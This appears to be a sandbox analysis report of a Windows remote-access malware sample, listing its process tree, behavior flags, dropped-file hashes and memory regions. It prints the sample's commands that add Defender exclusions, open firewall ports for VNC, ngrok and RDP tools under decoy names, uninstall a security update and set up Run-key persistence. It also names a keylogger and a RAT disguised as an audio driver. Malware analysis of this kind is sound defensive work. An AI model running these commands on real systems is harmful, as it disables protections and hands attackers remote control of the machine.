C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom.exe4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe & exit3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe & exit3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\enableff.exe & exit3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\enableff.exe4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Adduser.exe & exit3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Adduser.exe4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe & exit3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Venomadd.exe & exit3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Venomadd.exe4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Venomdpr.exe & exit3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Venomdpr.exe4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\autoupdate1.exe & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\autoupdate2.exe & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\update.exe & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\enableff.exe & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\allow.exe & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\VenomDWelbasiD.exe & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files\RDP Wrapper & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b netsh advfirewall firewall add rule name=vnc action=allow dir=in protocol=tcp localport=5901 & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\Venom-winvnc.exe" enable=yes & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-ngrok" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\Venom-ngrok.exe" enable=yes & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe" enable=yes & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe" enable=yes & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" enable=yes & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" enable=yes & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows Folder" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\autoupdate1.exe" enable=yes & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows Service" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\autoupdate2.exe" enable=yes & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows Task" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\update.exe" enable=yes & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\venom_nkrok.exe" enable=yes & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows System" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\venom\nkrok.exe" enable=yes & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "ngrok" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\Venom-ngrok.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "ngrok" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\Venom-ngrok.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "vnc" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\Venom-winvnc.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "rdp" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "vnc" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\Venom-winvnc.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "rdp" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" -Action Allow & exit3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Google" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe" -Action Allow & exit3⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Google" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Chrome" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Chrome" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Update" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Update" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows task" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\autoupdate1.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows task" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\autoupdate1.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Service" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\autoupdate2.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Service" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\autoupdate2.exe" -Action Allow & exit3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Folder" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\update.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Folder" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\update.exe" -Action Allow & exit3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\venom_nkrok.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows System" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\venom\nkrok.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\venom_nkrok.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows System" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\venom\nkrok.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b netsh advfirewall firewall add rule name=vnc action=allow dir=in protocol=tcp localport=5900 & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files (x86)\RDP Wrapper & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b wusa /uninstall /kb:4471332 /quiet & exit3⤵
-
C:\Users\Admin\AppData\Roaming\loader.exe"C:\Users\Admin\AppData\Roaming\loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\loader.exe"C:\Users\Admin\AppData\Roaming\loader.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\loader.exe"C:\Users\Admin\AppData\Roaming\loader.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\loader.exe"C:\Users\Admin\AppData\Roaming\loader.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\loader.exe"C:\Users\Admin\AppData\Roaming\loader.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"1⤵
- Adds Run key to start application
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Execution.vbsMD5
a76dc4fbd53fe8d087cb78ff16134a26
SHA18f565d5b491f4f7b27e6af34bb7798f9b5bb558b
SHA256b15dbb3f1554b1e6b0a66423df0a205b157276e2e3d31d7a1c7dd480d615e1e6
SHA51269de3d0f22c921f07e0db2324d4dfcec717a1cdcb47b24f19a53d21f7876b9099ff1a7e44ae037c38e1cc864d53b8ecac45c8b376bd7e497dd745c4347307470
-
C:\Users\Admin\AppData\Local\Execution2.vbsMD5
cf1d37e3ccdde125c06f1383c88d9358
SHA1dcb51cbdab941e7cec28817ffae2fba1f27f1931
SHA25635873184c68848d8275eea24d4484870cad72972c34e4c553786fec6f4321d7a
SHA512dade8e3835b9f4b317ab2a7e4e52b4df619b4e1ccb3ede46d90a440b77da1f9ffb30804e5b889c866661122f16b6a44319b71ddaf277f4bb43acf24f076b3d0b
-
C:\Users\Admin\AppData\Local\Execution5.vbsMD5
05a460cc05b28e1fc6ee9aadd0e2e7b1
SHA14ac79e93d6467e809acfbb2a5b0370537fb99460
SHA2562e841a3b2fcb2f3e5f87a25656a85cd6ea8bd9c04421ac636239fccc5f7cc7a9
SHA512471f54955d054cfe3b2f23a801e84f7261e70271c18bc9bba736cab948a6c4544b62b40f318d4a55df29e3e640f0529432fe7b69822238dbbcec222da86b13f7
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8YCK9U05\Xvl[1].exeMD5
cc902def500205aab6f429545192f812
SHA12ccfceac617697f11bc060843f2ac81dcd655244
SHA256ec1235d8980d63398de5811dc806194fa522565436f820e1f90424e7d4b4a0a1
SHA512f7d6976187a4be1c825b058ab7db4cfea5e679288b4384352f9782aa69975ab9b302352da3fbf9f3ee30262479e2e273d60c46567dc184e4919314c5dc27d92f
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exeMD5
88ab0bb59b0b20816a833ba91c1606d3
SHA172c09b7789a4bac8fee41227d101daed8437edeb
SHA256f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA51205cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exeMD5
88ab0bb59b0b20816a833ba91c1606d3
SHA172c09b7789a4bac8fee41227d101daed8437edeb
SHA256f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA51205cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857
-
C:\Users\Admin\AppData\Local\Temp\compile.vbsMD5
ca906422a558f4bc9e471709f62ec1a9
SHA1e3da070007fdeae52779964df6f71fcb697ffb06
SHA256abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee
SHA512661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b
-
C:\Users\Admin\AppData\Local\Temp\compile.vbsMD5
ca906422a558f4bc9e471709f62ec1a9
SHA1e3da070007fdeae52779964df6f71fcb697ffb06
SHA256abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee
SHA512661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b
-
C:\Users\Admin\AppData\Local\Temp\configMD5
6c5c5aaadd88e8c19bbed9b070d135ef
SHA1abc6ecb99646ddafb3575b01e0f65ca48da4e55c
SHA2560e9e23a0758e739f54690f1b3f3880731d23bb5592e30badbe2fd857d3e77a15
SHA51294e0653ef293aa4fcff73244554ec0c158c8e781af122b063f189972d92261a208591d51a0d3a08077ffde15311717e9d8c0404b810bfc182bc4cd66c3781bc1
-
C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\A148453D7DB34E8789CC5F9EFA2DDF22DAAD9ADBMD5
8d9ae8f584f8ec4a42c1b44c6c28e276
SHA1803b39c50ae97bbb8abe54d462be2e4aa056db53
SHA256dd2477744f96c5565d717a4167fa804f9400645d0ffe16d347e3ab8b32405d30
SHA512e34a522edd605fe2d8ab774a5a993388b744759f1d016038790e4d128f764806020321f1b65fb47203d4f344158eedc5f53145ef483d7800e731c24dd9bbeef0
-
C:\Users\Admin\AppData\Roaming\keylogger py best.exeMD5
a20d50809d850ea9621ec8056ca52ee9
SHA147cd25041ec4a8c2ef397c2afd09fd2aaf6d3cd7
SHA256ceeedbfa74c764a7a927e33d3a8fe3fd6f2de12af2a7d9e0558062c3afa0581f
SHA5120f5b564403149bb0ca7851e989b433f00152ec9a95e0c52f4f3fc86f29832cc803c4969b4d06c1823b436facd6d987c448d5c640f01cc011025abe21a523643f
-
C:\Users\Admin\AppData\Roaming\keylogger py best.exeMD5
a20d50809d850ea9621ec8056ca52ee9
SHA147cd25041ec4a8c2ef397c2afd09fd2aaf6d3cd7
SHA256ceeedbfa74c764a7a927e33d3a8fe3fd6f2de12af2a7d9e0558062c3afa0581f
SHA5120f5b564403149bb0ca7851e989b433f00152ec9a95e0c52f4f3fc86f29832cc803c4969b4d06c1823b436facd6d987c448d5c640f01cc011025abe21a523643f
-
C:\Users\Admin\AppData\Roaming\loader.exeMD5
cd8ab729965533ed53755d09ad10c790
SHA1d09623a311dad9eb598cd2ef234ea1d6bfaf318e
SHA2569e8d78ad8a4a11f3904d7cb5b06d08ffdb73262f2f44d810e5b5b6dcb15c736f
SHA512834714dbbad108be2c1a52f0338782b4fee10b9ab999526dd175b338fe98b58857e36104a5300e989ae9bfa1e7432004ab5a5d422c9d23067941457f7abc6b0f
-
C:\Users\Admin\AppData\Roaming\loader.exeMD5
cd8ab729965533ed53755d09ad10c790
SHA1d09623a311dad9eb598cd2ef234ea1d6bfaf318e
SHA2569e8d78ad8a4a11f3904d7cb5b06d08ffdb73262f2f44d810e5b5b6dcb15c736f
SHA512834714dbbad108be2c1a52f0338782b4fee10b9ab999526dd175b338fe98b58857e36104a5300e989ae9bfa1e7432004ab5a5d422c9d23067941457f7abc6b0f
-
C:\Users\Admin\AppData\Roaming\loader.exeMD5
cc902def500205aab6f429545192f812
SHA12ccfceac617697f11bc060843f2ac81dcd655244
SHA256ec1235d8980d63398de5811dc806194fa522565436f820e1f90424e7d4b4a0a1
SHA512f7d6976187a4be1c825b058ab7db4cfea5e679288b4384352f9782aa69975ab9b302352da3fbf9f3ee30262479e2e273d60c46567dc184e4919314c5dc27d92f
-
C:\Users\Admin\AppData\Roaming\loader.exeMD5
cc902def500205aab6f429545192f812
SHA12ccfceac617697f11bc060843f2ac81dcd655244
SHA256ec1235d8980d63398de5811dc806194fa522565436f820e1f90424e7d4b4a0a1
SHA512f7d6976187a4be1c825b058ab7db4cfea5e679288b4384352f9782aa69975ab9b302352da3fbf9f3ee30262479e2e273d60c46567dc184e4919314c5dc27d92f
-
C:\Users\Admin\AppData\Roaming\loader.exeMD5
9afa5b759296fb418e2bcb1b43894945
SHA132ae808e83aa68d2c093357ad60bb9cd5aeb16d9
SHA256987506daa9d7e8c4c64395c241b944f42a80fb74d5cb0a2f7e86d33b3f725155
SHA51254fcfe17b96c338957839c54880a8e7f7fed220e4200886f28420a194c17325585a73b0ee5f15daf281a2569cf02bd4f246bf00931803e3ee1d5d64df1d2da36
-
C:\Users\Admin\AppData\Roaming\loader.exeMD5
9afa5b759296fb418e2bcb1b43894945
SHA132ae808e83aa68d2c093357ad60bb9cd5aeb16d9
SHA256987506daa9d7e8c4c64395c241b944f42a80fb74d5cb0a2f7e86d33b3f725155
SHA51254fcfe17b96c338957839c54880a8e7f7fed220e4200886f28420a194c17325585a73b0ee5f15daf281a2569cf02bd4f246bf00931803e3ee1d5d64df1d2da36
-
C:\Users\Admin\AppData\Roaming\loader.exeMD5
9afa5b759296fb418e2bcb1b43894945
SHA132ae808e83aa68d2c093357ad60bb9cd5aeb16d9
SHA256987506daa9d7e8c4c64395c241b944f42a80fb74d5cb0a2f7e86d33b3f725155
SHA51254fcfe17b96c338957839c54880a8e7f7fed220e4200886f28420a194c17325585a73b0ee5f15daf281a2569cf02bd4f246bf00931803e3ee1d5d64df1d2da36
-
C:\Users\Admin\AppData\Roaming\loader.exeMD5
9afa5b759296fb418e2bcb1b43894945
SHA132ae808e83aa68d2c093357ad60bb9cd5aeb16d9
SHA256987506daa9d7e8c4c64395c241b944f42a80fb74d5cb0a2f7e86d33b3f725155
SHA51254fcfe17b96c338957839c54880a8e7f7fed220e4200886f28420a194c17325585a73b0ee5f15daf281a2569cf02bd4f246bf00931803e3ee1d5d64df1d2da36
-
C:\Users\Admin\AppData\Roaming\rat v6.exeMD5
8a177113878be7de28f07a9f2b2bd56a
SHA1355d23771a07b4c6aaf86c6c28eb61f873b7e000
SHA25626fd51dc28ce76d5aa5914bdf6f9cac0a6afd41d1f13c9af2c299f92e339216d
SHA5121407fc16318918f0314bcf8ad9c5c7e2690f7fd3260246b93e131f83ff355cc52528e1cd13cd2ef809000673b070508ae0b675de4554090fac8483be8ffe6b6b
-
C:\Users\Admin\AppData\Roaming\rat v6.exeMD5
8a177113878be7de28f07a9f2b2bd56a
SHA1355d23771a07b4c6aaf86c6c28eb61f873b7e000
SHA25626fd51dc28ce76d5aa5914bdf6f9cac0a6afd41d1f13c9af2c299f92e339216d
SHA5121407fc16318918f0314bcf8ad9c5c7e2690f7fd3260246b93e131f83ff355cc52528e1cd13cd2ef809000673b070508ae0b675de4554090fac8483be8ffe6b6b
-
C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exeMD5
8a177113878be7de28f07a9f2b2bd56a
SHA1355d23771a07b4c6aaf86c6c28eb61f873b7e000
SHA25626fd51dc28ce76d5aa5914bdf6f9cac0a6afd41d1f13c9af2c299f92e339216d
SHA5121407fc16318918f0314bcf8ad9c5c7e2690f7fd3260246b93e131f83ff355cc52528e1cd13cd2ef809000673b070508ae0b675de4554090fac8483be8ffe6b6b
-
C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exeMD5
8a177113878be7de28f07a9f2b2bd56a
SHA1355d23771a07b4c6aaf86c6c28eb61f873b7e000
SHA25626fd51dc28ce76d5aa5914bdf6f9cac0a6afd41d1f13c9af2c299f92e339216d
SHA5121407fc16318918f0314bcf8ad9c5c7e2690f7fd3260246b93e131f83ff355cc52528e1cd13cd2ef809000673b070508ae0b675de4554090fac8483be8ffe6b6b
-
memory/344-206-0x0000000003550000-0x0000000003551000-memory.dmpFilesize
4KB
-
memory/344-205-0x0000000003550000-0x0000000003551000-memory.dmpFilesize
4KB
-
memory/344-236-0x0000000004F60000-0x0000000004F61000-memory.dmpFilesize
4KB
-
memory/344-202-0x0000000000000000-mapping.dmp
-
memory/344-239-0x0000000004F62000-0x0000000004F63000-memory.dmpFilesize
4KB
-
memory/820-160-0x0000000000000000-mapping.dmp
-
memory/888-161-0x0000000000000000-mapping.dmp
-
memory/888-171-0x0000000004FA0000-0x000000000549E000-memory.dmpFilesize
5.0MB
-
memory/956-191-0x0000000000000000-mapping.dmp
-
memory/1016-303-0x0000000000000000-mapping.dmp
-
memory/1104-323-0x0000000000000000-mapping.dmp
-
memory/1196-324-0x0000000000000000-mapping.dmp
-
memory/1200-176-0x0000000000000000-mapping.dmp
-
memory/1232-215-0x0000000000000000-mapping.dmp
-
memory/1260-188-0x0000000000000000-mapping.dmp
-
memory/1304-300-0x0000000000000000-mapping.dmp
-
memory/1340-172-0x0000000006550000-0x0000000006554000-memory.dmpFilesize
16KB
-
memory/1340-129-0x0000000005660000-0x0000000005661000-memory.dmpFilesize
4KB
-
memory/1340-148-0x00000000061A0000-0x00000000061A1000-memory.dmpFilesize
4KB
-
memory/1340-167-0x0000000006670000-0x0000000006671000-memory.dmpFilesize
4KB
-
memory/1340-137-0x0000000005160000-0x000000000565E000-memory.dmpFilesize
5.0MB
-
memory/1340-122-0x0000000000000000-mapping.dmp
-
memory/1340-154-0x0000000006570000-0x0000000006571000-memory.dmpFilesize
4KB
-
memory/1340-127-0x00000000008C0000-0x00000000008C1000-memory.dmpFilesize
4KB
-
memory/1340-132-0x0000000005230000-0x0000000005231000-memory.dmpFilesize
4KB
-
memory/1376-151-0x00007FFB93DD0000-0x00007FFB93FAB000-memory.dmpFilesize
1.9MB
-
memory/1376-153-0x00007FFB92070000-0x00007FFB921BA000-memory.dmpFilesize
1.3MB
-
memory/1376-152-0x00007FFB92330000-0x00007FFB923DE000-memory.dmpFilesize
696KB
-
memory/1376-139-0x0000000140000000-0x0000000141434000-memory.dmpFilesize
20.2MB
-
memory/1376-150-0x00007FFB93FB0000-0x00007FFB93FB2000-memory.dmpFilesize
8KB
-
memory/1376-133-0x0000000000000000-mapping.dmp
-
memory/1404-231-0x0000000004340000-0x0000000004341000-memory.dmpFilesize
4KB
-
memory/1404-197-0x00000000007E0000-0x00000000007E1000-memory.dmpFilesize
4KB
-
memory/1404-233-0x0000000004342000-0x0000000004343000-memory.dmpFilesize
4KB
-
memory/1404-193-0x0000000000000000-mapping.dmp
-
memory/1404-199-0x00000000007E0000-0x00000000007E1000-memory.dmpFilesize
4KB
-
memory/1532-290-0x0000000000000000-mapping.dmp
-
memory/1564-181-0x0000000000000000-mapping.dmp
-
memory/1572-196-0x0000000000000000-mapping.dmp
-
memory/1644-241-0x0000000004AB0000-0x0000000004AB1000-memory.dmpFilesize
4KB
-
memory/1644-223-0x0000000000000000-mapping.dmp
-
memory/1644-235-0x0000000003050000-0x0000000003051000-memory.dmpFilesize
4KB
-
memory/1644-271-0x0000000004AB2000-0x0000000004AB3000-memory.dmpFilesize
4KB
-
